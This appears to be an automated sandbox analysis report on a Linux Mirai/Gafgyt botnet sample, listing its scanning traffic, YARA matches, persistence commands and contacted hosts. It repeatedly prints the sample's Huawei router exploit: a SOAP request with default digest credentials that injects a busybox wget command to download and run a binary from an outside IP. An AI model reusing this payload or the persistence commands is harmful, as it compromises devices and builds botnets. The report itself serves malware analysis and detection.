          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.175.227.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.23.228.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.204.226.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.161.81.210:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.168.151.105:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.140.212.149:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.48.104.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.102.156.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.178.168.190:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 65.182.26.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.114.181.210:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.161.86.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.205.152.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.152.241.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.195.113.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.72.252.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.37.209.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 152.88.129.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.195.191.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.4.72.13:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 84.63.4.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.117.192.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.136.99.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.10.1.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 198.119.81.107:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.81.140.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 202.67.234.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 27.117.78.192:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.173.155.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 141.175.98.36:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.169.77.163:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.235.151.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.132.249.94:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.57.244.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.124.214.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.246.186.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.57.133.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 119.247.57.158:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.136.253.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.62.216.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.201.54.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.9.29.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.70.151.41:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.19.94.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.61.226.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.237.96.229:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.20.55.235:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.156.79.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.30.254.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.239.63.43:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.196.86.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.174.203.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 73.42.239.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.208.127.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.144.207.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.204.59.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.175.199.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.77.161.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 114.69.13.228:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.4.252.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.187.145.29:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.139.211.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.175.75.131:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.244.194.243:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.69.211.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 208.198.171.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.201.194.18:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.149.102.25:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.73.15.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.168.191.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.28.203.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.3.246.45:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.190.146.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 84.179.2.155:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.116.186.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.173.92.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.188.108.238:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 115.54.5.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.121.173.110:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 90.198.128.38:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.142.26.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 202.246.13.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.149.69.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.72.75.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.70.0.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.106.15.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 126.94.108.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 41.87.79.142:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 197.83.202.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 157.135.167.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 144.165.137.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:44424 -> 119.3.250.207:37215
          Source: global traffic
          HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Connection: keep-alive
          Accept: */*
          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
          Content-Length: 457
          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknown, Network traffic detected: HTTP traffic on port 43928 -> 443
          Source: unknown, Network traffic detected: HTTP traffic on port 42836 -> 443
          Source: unknown, TCP traffic detected without corresponding DNS query
          Source: XHZFo8hExw.elf, String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: XHZFo8hExw.elf, String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknown, HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Connection: keep-alive
          Accept: */*
          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
          Content-Length: 457
          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: unknownDNS traffic detected: queries for: kamuiv3.hopto.org

          System Summary

          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: Process Memory Space: XHZFo8hExw.elf PID: 6226, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: XHZFo8hExw.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: Process Memory Space: XHZFo8hExw.elf PID: 6226, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: ELF static info symbol of initial sample .symtab present: no
          Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sample String containing 'busybox' found: /bin/busybox
          Source: Initial sample String containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sample String containing 'busybox' found: Content-Length: /bin/busybox/bin/watchdog/bin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
          Source: classification engine Classification label: mal96.troj.linELF@0/0@1/0

          Persistence and Installation Behavior

          Source: /bin/sh (PID: 6230) Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /bin/sh (PID: 6229) Mkdir executable: /usr/bin/mkdir -> mkdir bin
          Source: /bin/sh (PID: 6230) Chmod executable: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /tmp/XHZFo8hExw.elf (PID: 6232) File opened: /proc/6233/cmdline
          Source: /usr/bin/chmod (PID: 6230) File: /tmp/bin/watchdog (bits: - usr: rwx grp: rwx all: rwx)
          Source: /tmp/XHZFo8hExw.elf (PID: 6227) Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin; >bin/watchdog && mv */tmp/XHZFo8hExw.elf <\\xc0\\xbc\\xff\\x84\\x83\\x86\tbin/watchdog; chmod 777 bin/watchdog"
          Source: /bin/sh (PID: 6228) Rm executable: /usr/bin/rm -> rm -rf bin/watchdog
          Source: submitted sample Stderr: sh: 1: cannot open : No such file: exit code = 0

          Hooking and other Techniques for Hiding and Protection

          Source: unknown Network traffic detected: HTTP traffic on port 46574 -> 37215

          Stealing of Sensitive Information

          Source: Yara match File source: XHZFo8hExw.elf, type: SAMPLE
          Source: Yara match File source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match File source: XHZFo8hExw.elf, type: SAMPLE
          Source: Yara match File source: 6226.1.0000000008048000.0000000008056000.r-x.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Scripting | Path Interception | Path Interception | 2 File and Directory Permissions Modification | 1 OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Scripting | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          No configs have been found
          [Behavior graph: ID: 830724, Sample: XHZFo8hExw.elf, Startdate: 20/03/2023, Architecture: LINUX, Score: 96]
          Source | Detection | Scanner | Label | Link
          XHZFo8hExw.elf | 59% | ReversingLabs | Linux.Trojan.Mirai |
          XHZFo8hExw.elf | 100% | Joe Sandbox ML | |
          No Antivirus matches
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          kamuiv3.hopto.org | 103.161.181.97 | true | true | | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://schemas.xmlsoap.org/soap/encoding/ | XHZFo8hExw.elf | false | | high
          http://schemas.xmlsoap.org/soap/envelope/ | XHZFo8hExw.elf | false | | high
                41.122.225.65
                unknownSouth Africa
                16637MTNNS-ASZAfalse
                197.18.83.242
                unknownTunisia
                37693TUNISIANATNfalse
                197.165.20.92
                unknownEgypt
                24863LINKdotNET-ASEGfalse
                157.187.69.254
                unknownUnited States
                668DNIC-AS-00668USfalse
                41.43.219.135
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                41.188.184.88
                unknownTanzania United Republic of
                37084simbanet-tzTZfalse
                41.195.197.32
                unknownSouth Africa
                16637MTNNS-ASZAfalse
                197.4.200.59
                unknownTunisia
                5438ATI-TNfalse
                157.14.224.90
                unknownJapan2519VECTANTARTERIANetworksCorporationJPfalse
                197.251.50.141
                unknownSudan
                37197SUDRENSDfalse
                177.244.235.199
                unknownMexico
                13999MegaCableSAdeCVMXfalse
                157.74.40.98
                unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
                17.199.135.173
                unknownUnited States
                714APPLE-ENGINEERINGUSfalse
                208.115.146.123
                unknownUnited States
                17385ORBITELUSfalse
                52.195.214.237
                unknownUnited States
                16509AMAZON-02USfalse
                157.107.251.195
                unknownJapan4685ASAHI-NETAsahiNetJPfalse
                157.87.159.74
                unknownUnited States
                21612FUNDACAOINSTITUTOOSWALDOCRUZBRfalse
                41.225.230.125
                unknownTunisia
                37671GLOBALNET-ASTNfalse
                53.212.253.138
                unknownGermany
                31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                197.89.196.43
                unknownSouth Africa
                10474OPTINETZAfalse
                122.137.112.239
                unknownChina
                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                100.172.140.117
                unknownUnited States
                21928T-MOBILE-AS21928USfalse
                197.206.228.129
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                157.163.181.143
                unknownGermany
                22192SSHENETUSfalse
                41.55.86.135
                unknownSouth Africa
                37168CELL-CZAfalse
                41.145.167.174
                unknownSouth Africa
                5713SAIX-NETZAfalse
                125.215.76.137
                unknownJapan7522STCNSTNetIncorporatedJPfalse
                197.235.69.37
                unknownMozambique
                37223VODACOM-MZfalse
                197.77.89.52
                unknownSouth Africa
                16637MTNNS-ASZAfalse
                157.75.1.57
                unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
                157.245.211.186
                unknownUnited States
                14061DIGITALOCEAN-ASNUSfalse
                142.237.203.2
                unknownCanada
                32347PRAN-ASNCAfalse
                135.89.221.28
                unknownUnited States
                10455LUCENT-CIOUSfalse
                157.76.253.214
                unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                197.49.160.167
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                197.30.202.42
                unknownTunisia
                37492ORANGE-TNfalse
                89.2.156.164
                unknownFrance
                21502ASN-NUMERICABLEFRfalse
                197.36.184.199
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                197.32.129.131
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                157.77.13.122
                unknownJapan4678FINECanonITSolutionsIncJPfalse
                62.182.140.55
                unknownRussian Federation
                29497KUBANGSMRUfalse
                64.242.55.75
                unknownUnited States
                3561CENTURYLINK-LEGACY-SAVVISUSfalse
                157.215.239.34
                unknownUnited States
                4704SANNETRakutenMobileIncJPfalse
                201.123.86.80
                unknownMexico
                8151UninetSAdeCVMXfalse
                197.179.217.80
                unknownKenya
                33771SAFARICOM-LIMITEDKEfalse
                41.204.140.219
                unknownTanzania United Republic of
                36930Zantel-ASTZfalse
                41.239.63.43
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                97.251.204.235
                unknownUnited States
                6167CELLCO-PARTUSfalse
                197.206.175.64
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                41.193.123.107
                unknownSouth Africa
                11845Vox-TelecomZAfalse
                No context
                No created / dropped files found
                File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                Entropy (8bit):6.508652600152545
                TrID:
                • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
